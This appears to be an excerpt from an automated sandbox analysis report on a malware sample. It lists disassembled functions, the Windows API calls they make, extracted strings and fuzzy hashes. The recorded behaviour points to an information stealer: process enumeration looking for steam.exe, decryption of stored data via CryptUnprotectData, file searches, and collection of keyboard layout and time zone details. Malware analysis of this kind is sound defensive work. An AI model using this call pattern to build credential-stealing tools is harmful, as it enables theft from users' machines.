                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: bc1922ece39328686c400ed79e45fdf5ef3b47e6cc89be6fbc9388eb7eed7652
                          • Instruction ID: 4aafca094f55d4fa665927c4da91c0dafdebdc220363f53a4f6808c672df9c75
                          • Opcode Fuzzy Hash: bc1922ece39328686c400ed79e45fdf5ef3b47e6cc89be6fbc9388eb7eed7652
                          • Instruction Fuzzy Hash: 890162716012249BE7209B70AC89FEB77BDEF49750F4401DAF908D2140EFB899948FE5
                          Function 00414B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00414B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414B7F
                          • lstrlen.KERNEL32(00434CA8), ref: 00414B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414BA7
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 00414BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00414BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: d3f93e8c6116b67d666939df329622ea89059412740c0aa47a945d6ddda3b822
                          • Instruction ID: 4dbd3cd07a2629b2c982ad2ca07760dbd8a2ad2fcb84496f2e545fc852b2e6a3
                          • Opcode Fuzzy Hash: d3f93e8c6116b67d666939df329622ea89059412740c0aa47a945d6ddda3b822
                          • Instruction Fuzzy Hash: 153130317115159BC722EF29EE89A9F77B5AF80314F00113AB805A72D1CFB8EC458FA8
                          Function 00422D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00422D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00422DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00422DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00422DEC
                          • LocalFree.KERNEL32(00000000), ref: 00422FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 6caac9e4e9da962acb08f16bfc44d7664d89c46914e57893374660aea1a7ed6d
                          • Instruction ID: 7ad3dd5c0188483891bc65089340f002ce2889567c347d74d5712d79ac24ba56
                          • Opcode Fuzzy Hash: 6caac9e4e9da962acb08f16bfc44d7664d89c46914e57893374660aea1a7ed6d
                          • Instruction Fuzzy Hash: BFB13D70A00224DFC714CF14DA48B56B7F1FB44319F6AC1AAD409AB3A1D7BA9D82DF94
                          Function 007B9896 Relevance: 10.4, Strings: 7, Instructions: 1684COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &?N$(CO$+uk$3>$W;mj$vg6_$}82o
                          • API String ID: 0-1634606787
                          • Opcode ID: 06ac34ce36053163f00b6fd6054f725ef4223c31285d1708a31fa43c00ea03d5
                          • Instruction ID: 4a6b9ca01f9627e97560ed5c810943769df90f9b3c8d6c3b50fe192a61e8064b
                          • Opcode Fuzzy Hash: 06ac34ce36053163f00b6fd6054f725ef4223c31285d1708a31fa43c00ea03d5
                          • Instruction Fuzzy Hash: C9B219F360C2049FE304AE2DDC8567AB7EAEFD4720F1A853DE6C5C7744EA3598018696
                          Function 007C8CFE Relevance: 10.4, Strings: 7, Instructions: 1666COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %w_$*g7s$4<w$O~V$t m$G~m$Kgu
                          • API String ID: 0-2981182066
                          • Opcode ID: dd33459cc40e7178d30ce3e1bc3ed23b3dd0a46f5b31f9b09f5f67aecd9382c3
                          • Instruction ID: 6b6e83da0482b9fdcb29ab4415d500a82d5c4e005af69457b7f910d16e1fe57d
                          • Opcode Fuzzy Hash: dd33459cc40e7178d30ce3e1bc3ed23b3dd0a46f5b31f9b09f5f67aecd9382c3
                          • Instruction Fuzzy Hash: D7B24AF360C2149FE7046E2DEC8567AFBE9EF94320F1A493DE6C4C3744EA7558058692
                          Function 007C5797 Relevance: 10.4, Strings: 7, Instructions: 1622COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &&/{$,a;$3?uT$>0q{$S$4|$[6Sf$fg>_
                          • API String ID: 0-3412472070
                          • Opcode ID: debd296cec69df62c5d786e4e89f34246426bf2f286cd8e594a667496171d0b4
                          • Instruction ID: 4a6a2e6b7d999017bc519eaefae5c5a1a6ea0d07949ca065f62f6decdf6e6a10
                          • Opcode Fuzzy Hash: debd296cec69df62c5d786e4e89f34246426bf2f286cd8e594a667496171d0b4
                          • Instruction Fuzzy Hash: 59B2E6F360C2049FE304AE2DEC8567AFBE9EF94720F16493DE6C4C7744EA3598058696
                          Function 007B6239 Relevance: 9.2, Strings: 6, Instructions: 1698COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .EXC$PVo{$W@ $oOp$v;?_$vO
                          • API String ID: 0-2813548161
                          • Opcode ID: 2076de428e6a670a7d157a5c37541cde7b780caa34374467fe66b34af30c3b26
                          • Instruction ID: 5d790b9f97de9a55233ed8f7192376bdade5d05ea6bfa1579a7632f5e13c3de0
                          • Opcode Fuzzy Hash: 2076de428e6a670a7d157a5c37541cde7b780caa34374467fe66b34af30c3b26
                          • Instruction Fuzzy Hash: 80B237F360C2049FE304AE2DEC8567ABBEAEBD4320F1A453DE6C5C7744E93598058697
                          Function 00422C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00422C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00422C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 00422C58
                          • wsprintfA.USER32 ref: 00422C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: b0b5cb2ad12498860437fa942ab6e36db069a5d5969e1f97bbf7c175483cae77
                          • Instruction ID: b2d0bd2ac6cfd638374cf8de6dd304188861d3aa3a7e02ed7006079713995a6c
                          • Opcode Fuzzy Hash: b0b5cb2ad12498860437fa942ab6e36db069a5d5969e1f97bbf7c175483cae77
                          • Instruction Fuzzy Hash: 2301F771A04614ABD71C8B58DC4AB6AB76AEB84721F10432AF916D73C0D7B419008AE5
                          Function 007BB470 Relevance: 7.9, Strings: 5, Instructions: 1604COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &`m$R]]$`K}o$qur\$t\nO
                          • API String ID: 0-2438534936
                          • Opcode ID: 0f295d1111386a05324f7a08156b82dc993a2b63e72fea4e480c01f4cd887fca
                          • Instruction ID: 3292a079d65f720cd0aac379db5a5be31bcfeb221f53939920bf269c6ac4cf89
                          • Opcode Fuzzy Hash: 0f295d1111386a05324f7a08156b82dc993a2b63e72fea4e480c01f4cd887fca
                          • Instruction Fuzzy Hash: 73B2F5F3A082009FE704AE2DEC4577ABBE5EFD4720F1A893DE6C4C3744E63598058696
                          Function 00407750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00407765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
                          • LocalFree.KERNEL32(?), ref: 004077B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 6d1bfcca655919d7eab847b087b3d766d6f88c0200bb541f3522876a5bbf2ac9
                          • Instruction ID: 1a725d20c68c60ec7f3e027db1d0bf620a8c7a6af013d4c7a88df0b6a2bd9b64
                          • Opcode Fuzzy Hash: 6d1bfcca655919d7eab847b087b3d766d6f88c0200bb541f3522876a5bbf2ac9
                          • Instruction Fuzzy Hash: 6A011275B44318BBEB14DB949C4AFAA7B79EB44B15F104159FA05EB2C0D6B0A900CBE4
                          Function 007BEAD0 Relevance: 6.6, Strings: 4, Instructions: 1589COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4?Kk$6X}h$n?|$pL[|
                          • API String ID: 0-850682632
                          • Opcode ID: e2538894506d50a5f88044dacdf3821c094b235a5278d06d35a2ca747ebf3503
                          • Instruction ID: 9df98bf7140312b7085f3d82611533dd42e0504502c70c329ac552477ff3cd94
                          • Opcode Fuzzy Hash: e2538894506d50a5f88044dacdf3821c094b235a5278d06d35a2ca747ebf3503
                          • Instruction Fuzzy Hash: C1B2F5F360C2049FE7046E2DEC8566AFBE9EF94720F1A493DEAC4C7744E63598018697
                          Function 00423A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00423A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 00423AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00423ABF
                            • Part of subcall function 00427310: lstrlen.KERNEL32(------,00405BEB), ref: 0042731B
                            • Part of subcall function 00427310: lstrcpy.KERNEL32(00000000), ref: 0042733F
